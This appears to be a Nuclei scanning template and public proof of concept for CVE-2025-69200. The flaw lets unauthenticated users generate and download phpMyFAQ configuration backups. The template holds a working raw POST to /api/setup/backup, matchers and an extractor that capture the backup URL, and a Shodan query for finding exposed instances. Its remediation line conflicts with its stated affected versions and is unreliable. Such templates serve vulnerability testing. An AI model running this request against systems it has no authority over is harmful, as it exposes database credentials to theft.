phpMyFAQ <= 4.0.16 contains an information disclosure vulnerability caused by unauthenticated access to configuration backup ZIP generation and download, letting remote attackers access sensitive configuration files, exploit requires no authentication.
PoC代码[已公开]
id: CVE-2025-69200
info:
name: phpMyFAQ - Configuration Backup Disclosure
author: Louay-075
severity: high
description: |
phpMyFAQ <= 4.0.16 contains an information disclosure vulnerability caused by unauthenticated access to configuration backup ZIP generation and download, letting remote attackers access sensitive configuration files, exploit requires no authentication.
impact: |
Remote attackers can access sensitive configuration files, exposing database credentials and enabling further compromise.
remediation: |
Update to version 4.0.16 or later.
reference:
- https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69200
- https://nvd.nist.gov/vuln/detail/CVE-2025-69200
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-69200
epss-score: 0.05286
epss-percentile: 0.89699
cwe-id: CWE-202
metadata:
verified: true
shodan-query: 'http.title:"phpMyFAQ"'
max-request: 1
product: phpmyfaq
vendor: phpmyfaq
tags: cve,cve2025,phpmyfaq,backup,exposure
http:
- raw:
- |
POST /api/setup/backup HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
4.1.0-RC
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"backupFile":"'
- '.zip'
condition: and
- type: word
words:
- "error"
- "forbidden"
negative: true
- type: word
part: content_type
words:
- application/json
extractors:
- type: json
name: backup_url
json:
- '.backupFile'
# digest: 4a0a00473045022100d3c0f1c89f6d308c891da5e986664730dd8e2242945eb2f0fd1ad7f321034e3b022037d8d1f44669d0549c06e95ad9087a031f3e0088292ae0c7ab4fc3a0b65aab9b:922c64590222798bb761d5b6d8e72950